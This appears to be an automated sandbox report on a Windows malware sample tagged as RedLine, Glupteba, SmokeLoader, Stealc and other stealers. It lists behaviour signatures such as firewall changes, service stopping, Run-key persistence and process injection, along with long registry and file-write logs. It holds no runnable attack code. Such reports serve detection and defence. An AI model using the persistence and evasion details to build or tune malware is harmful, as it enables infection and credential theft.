Malware Analysis Report

2024-11-13 19:09

Sample ID 231111-11ynnsce56
Target 07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0
SHA256 07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0
Tags
glupteba mystic redline smokeloader stealc zgrat taiga up3 backdoor google dropper evasion infostealer loader persistence phishing rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0

Threat Level: Known bad

The file 07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0 was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline smokeloader stealc zgrat taiga up3 backdoor google dropper evasion infostealer loader persistence phishing rat stealer trojan

Detect ZGRat V1

Glupteba payload

Detected google phishing page

SmokeLoader

Detect Mystic stealer payload

Stealc

Mystic

ZGRat

Glupteba

RedLine payload

RedLine

Modifies Windows Firewall

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Program crash

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Checks SCSI registry key(s)

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 22:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 22:07

Reported

2023-11-11 22:10

Platform

win10-20231020-en

Max time kernel

9s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Detected google phishing page

phishing google

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1448 set thread context of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 30744180eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 9d620f80eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 95d38180eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d3bf8d80eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 673e2780eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = defb0f82eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
